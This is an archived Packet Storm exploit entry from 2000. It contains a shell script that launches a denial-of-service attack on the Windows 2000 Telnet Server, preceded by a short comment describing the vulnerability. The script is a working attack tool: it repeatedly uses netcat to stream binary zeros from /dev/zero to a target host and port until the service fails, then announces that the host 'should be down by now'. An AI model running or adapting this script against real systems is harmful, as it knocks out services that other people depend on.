msw2ktelnetdos.sh

2000-09-07T00:00:00
ID PACKETSTORM:22970
Type packetstorm
Reporter WC
Modified 2000-09-07T00:00:00

Description

                                        
                                            `##################################################################  
# #  
# Microsoft Windows 2000 Telnet Server DoS Vulnerability #  
# #  
# #  
# Microsoft Windows 2000 Server comes with a telnet server to #  
# provide remote console access. A remote attacker can send a #  
# stream of binary zeros to the server, causing it to fail. If #  
# automatic restart is enabled, numerous attacks will cause the #  
# telnet server to restart until the maximum failure/restart #  
# count is exceeded at which point the service is disabled. #  
# #  
##################################################################  
  
nc_path="/usr/bin/nc"  
timez=1  
port=23  
  
if test $# -lt 1  
then  
echo "Microsoft Windows 2000 Telnet Server DoS by wildcoyote@coders-pt.org"  
echo "Usage: msW2kTelnetDoS.sh <host> [number of timez to hit] [port]"  
else  
echo "Microsoft Windows 2000 Telnet Server DoS by wildcoyote@coders-pt.org"  
if test -f $nc_path  
then  
if test $# -eq 2  
then  
timez=$2  
elif test $# -eq 3  
then  
port=$3  
fi  
test_var=0  
echo "Hitting $1 [$port] $timez timez..."  
while test $test_var -lt $timez  
do  
$nc_path $1 $port < /dev/zero  
test_var=`expr $test_var + 1`  
done  
echo "All done...$1 should be down by now :]"  
else  
echo "netcat wasnt found on the path you defined ($nc_path)"  
fi  
echo "Regardz, wildcoyote@coders-pt.org"  
fi  
/* www.hack.co.za [1 August]*/`